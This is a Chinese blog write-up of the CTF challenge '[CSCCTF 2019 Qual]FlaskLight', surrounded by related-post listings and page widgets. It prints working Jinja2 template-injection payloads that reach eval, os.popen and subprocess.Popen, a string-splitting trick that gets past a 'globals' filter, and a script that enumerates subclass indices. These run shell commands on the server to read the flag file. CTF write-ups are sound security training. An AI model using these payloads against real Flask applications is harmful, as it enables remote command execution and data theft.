[CSCCTF 2019 Qual]FlaskLight

最新推荐文章于 2024-07-19 15:12:55 发布
最新推荐文章于 2024-07-19 15:12:55 发布
阅读量168 收藏
点赞数 1
分类专栏: ssti模板注入 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fmyyy1/article/details/115518795
版权

场景
在这里插入图片描述
根据题目提示,应该是flask模板注入题。
看源码
在这里插入图片描述
提示用get传参,直接传?search={{7*‘7’}}
在这里插入图片描述
证明是flask模板注入。
先找类
''.__class__.__mro__
在这里插入图片描述
爆出ojbect的所有子类
''.__class__.__mro__[2].__subclasses__()
在这里插入图片描述
试了一些常规payload都不行,参考了wp,过滤了globals,可以用字符串拼接。

warnings.catch_warnings

用脚本找到这个类的位置为59,

{{''.__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__('os').popen('ls').read()")}}

在这里插入图片描述

flag在/flasklight/coomme_geeeett_youur_flek下
在这里插入图片描述

class’site._Printer

跟上一个差不多,因为同样需要globals,所以字符串拼接

{{[].__class__.__base__.__subclasses__()[71].__init__['__glo'+'bals__']['os'].popen('ls').read()}}

官方wp subprocess.Popen

用这个类不需要用到globals,找到位置
脚本:

import re
import requests
import html
import time

def search():
	for i in range(500):
		time.sleep(0.2)
		url = "http://728c55eb-232d-4b41-86dd-d2b0c3c59e78.node3.buuoj.cn/?search={{''.__class__.__mro__[2].__subclasses__()[%s]}}"%i
		s = requests.get(url)
		res = re.findall("<h2>You searched for:<\/h2>\W+<h3>(.*)<\/h3>", s.text)
		res = ''.join(res)
		str = html.unescape(res)
		print("{} : {}".format(i,str))
		if 'subprocess.Popen' in s.text:
			print(i)
			break



if __name__ == '__main__':
	search()

在这里插入图片描述

{{''.__class__.__mro__[2].__subclasses__()[258]('ls',shell=True,stdout=-1).communicate()[0].strip()}}
{{''.__class__.__mro__[2].__subclasses__()[258]('ls /flasklight',shell=True,stdout=-1).communicate()[0].strip()}}
{{''.__class__.__mro__[2].__subclasses__()[258]('cat /flasklight/coomme_geeeett_youur_flek',shell=True,stdout=-1).communicate()[0].strip()}}
fmyyy1
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
ssti练习之[CSCCTF 2019 Qual]FlaskLight 1
weixin_48335916的博客
01-05 526
[CSCCTF 2019 Qual]FlaskLight 1 查看网页源代码,发现里面的提示 尝试输入url http://e1f8bf68-fab7-482f-901b-12c336d1cdeb.node3.buuoj.cn/?search={{1*9}} 成功回显,说明存在ssti注入 使用{{’’.class.mro[2].subclasses()}},可以爆出object类中所有子类,找出subprocess.Popen,copy大佬额exp。 import requests import r
[CSCCTF 2019 Qual] FlaskLight
汗的博客
08-29 1546
信息收集 index大致就这样,没什么信息 F12看下,发现了线索:search参数 试下ssti 基本就是ssti了 漏洞利用 config 也是 Flask模版中的一个全局对象,它包含了所有应用程序的配置值。 {{ config.items() }} // 查看配置项目的信息 输入:http://xxxxx//?search={{%20config.items()%20}} 爆出一堆信息,这里获得第二个线索,flag在这个目录 You searched for: [('JSON_
BUUCTF:[CSCCTF 2019 Qual]FlaskLight
末初的CSDN博客
07-26 2752
题目地址:https://buuoj.cn/challenges#[CSCCTF%202019%20Qual]FlaskLight ?search={{7*7}} #通过回显判断SSTI ?search={{''.__class__.__mro__[2].__subclasses__()}} #爆出所有类 编写脚本查找可利用的类 利用subprocess.Popen执行命令 import requests import re import html import time index = 0 f
[CSCCTF 2019 Qual]FlaskLight 1
ubaichu的博客
07-19 905
[CSCCTF 2019 Qual]FlaskLight 1 详细解题步骤
一道[CSCCTF 2019 Qual]FlaskLight的详解再遇SSTI
sGanYu
07-29 1632
做这道题的时候,再次深入了解了一下SSTI,不过发现去讲解这题原理的文章实在是太少了,额也有可能是大佬觉得没有必要讲,不过在这里还是记录一下自己的一些解题思路,一方面也是防止自己忘记,可能会有错误,欢迎前来指正。.........
[CSCCTF 2019 Qual]FlaskLight SSTI注入
qq_54929891的博客
04-05 2288
进去后页面提示你是flask框架,f12里面告诉你参数名字叫做search并且用GET方法传输,十有八九是模块注入了,用7*7试试服务端模板注入攻击 - 知乎 可以发现在searched后面输出了49,既然我们可以利用{{}},又有输出点,直接模板注入GOGOGO python-flask模块注入(SSTI) - ctrl_TT豆 - 博客园因为不太熟,只能一步步来 ''.__class__ //先随便查看一个字符所属的类是什么 ''.__class__.__mro__ //返回...
[CSCCTF 2019 Qual]FlaskLight 记录
SopRomeo的博客
10-09 883
这个根据题目名字,flask模板注入,找注入点 查看源码发现GET传参 直接测试模板注入 存在sql注入 常规模板注入 试了试之前做过的模板注入,都行不通 然后百度了一波,原来这是python2的 难怪不行 {{''.__class__.__mro__[2].__subclasses__()}} 利用这个可以读取所有的类,然后看看能不能RCE 找到catch_warnings类, 但是无法RCE 看了wp,发现可以利用subprocess.Popen这个类来进行RCE 学废了 网上搜的模板注入,都没
QUAL2K模型
04-22
QUAL2K模型是一个综合性、多样化的河流水质模型,不仅适用于复杂的树枝状河流系统,还允许多个取水口、排污口存在以及支流流入流出,被广泛应用于流域污染物总量控制和水质管理。
qual2k模型论文
10-15
qual2k 模拟 水质模型 参数模拟设置 如何计算 适用于研究生水质模型计算参考
checker-qual-3.5.0-API文档-中文版.zip
06-05
赠送jar包:checker-qual-3.5.0.jar; 赠送原API文档:checker-qual-3.5.0-javadoc.jar; 赠送源代码:checker-qual-3.5.0-sources.jar; 赠送Maven依赖信息文件:checker-qual-3.5.0.pom; 包含翻译后的API文档:...
checker-compat-qual-2.0.0-API文档-中文版.zip
06-05
赠送jar包:checker-compat-qual-2.0.0.jar; 赠送原API文档:checker-compat-qual-2.0.0-javadoc.jar; 赠送源代码:checker-compat-qual-2.0.0-sources.jar; 赠送Maven依赖信息文件:checker-compat-qual-2.0.0....
checker-qual-2.11.1-API文档-中英对照版.zip
07-14
赠送jar包:checker-qual-2.11.1.jar; 赠送原API文档:checker-qual-2.11.1-javadoc.jar; 赠送源代码:checker-qual-2.11.1-sources.jar; 赠送Maven依赖信息文件:checker-qual-2.11.1.pom; 包含翻译后的API文档...
chromedriver-mac-arm64_126.0.6474.0.zip
07-31
chromedriver-mac-arm64_126.0.6474.0.zip
chromedriver-mac-arm64_128.0.6548.0.zip
07-31
chromedriver-mac-arm64_128.0.6548.0.zip
MySQL查询加速器:利用Query Cache提升效率
07-31
MySQL是一个流行的开源关系型数据库管理系统(RDBMS),广泛用于Web应用程序的后端数据存储。它基于结构化查询语言(SQL)来管理数据,并且是LAMP(Linux, Apache, MySQL, PHP/Python/Perl)技术栈的一部分,这个技术栈常用于构建动态网站和Web应用程序。 MySQL的特点包括: - **开放源代码**:MySQL的源代码是公开的,任何人都可以自由使用和修改。 - **跨平台**:MySQL可以在多种操作系统上运行,包括Linux、Windows、macOS等。 - **高性能**:MySQL以其快速的查询处理和良好的性能而闻名。 - **可靠性**:MySQL提供了多种机制来确保数据的完整性和可靠性,包括事务支持、备份和恢复功能。 - **易于使用**:MySQL提供了简单直观的界面和丰富的文档,便于用户学习和使用。 - **可扩展性**:MySQL支持从小型应用到大型企业级应用的扩展。 - **社区支持**:由于其广泛的使用,MySQL拥有一个活跃的开发者社区,提供大量的资源和支持。 MySQL被广泛应用于各种场景,包括在线事务处理(OL
Objective-C语言的基础教程.md
最新发布
07-31
Objective-C是一种面向对象的编程语言,是C语言的扩展。它主要用于苹果的iOS和macOS应用程序开发。
暂存暂存暂存暂存暂存暂存暂存暂存
07-31
暂存暂存暂存暂存暂存暂存暂存暂存
Java实现HTTP断点续传的多线程安全解决方法.zip
07-31
Java实现HTTP断点续传的多线程安全解决方法
thermo xcalibur qual browser 下载
09-23
thermo xcalibur qual browser 是为了分析质谱数据而设计的一款软件。 要下载 thermo xcalibur qual browser,可以按照以下步骤进行: 1. 首先,打开谷歌浏览器或其他任何你常用的浏览器。 2. 在搜索栏中输入 ...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值